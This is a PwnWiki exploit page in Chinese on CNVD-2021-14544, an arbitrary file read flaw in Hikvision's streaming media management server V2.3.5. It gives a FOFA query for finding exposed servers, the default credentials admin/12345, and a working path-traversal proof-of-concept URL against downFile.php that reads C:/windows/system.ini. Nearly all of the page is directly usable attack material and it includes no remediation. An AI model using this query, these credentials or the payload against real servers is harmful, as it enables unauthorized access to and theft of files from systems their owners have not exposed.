CNVD-2021-14544 HIKVISION 流媒體管理服務器後台任意文件讀取漏洞

From PwnWiki

Revision as of 11:44, 26 March 2021 by Pwnwiki (talk | contribs) (Marked this version for translation)

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Other languages:

Chinese • ‎中文（简体）‎ • ‎中文（繁體）‎

漏洞影響

杭州海康威视数字技术股份有限公司 流媒体管理服务器 V2.3.5

FOFA

FOFA：title="流媒体管理服务器"

默認登錄信息

admin/12345

POC

http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini

成功讀取 C:/windows/system.ini

參考

https://mp.weixin.qq.com/s/bnXxGWs0ft0G6Qcdlf9BDw

Retrieved from "https://pwnwiki.com/index.php?title=CNVD-2021-14544_HIKVISION_流媒體管理服務器_後台任意文件讀取漏洞&oldid=658"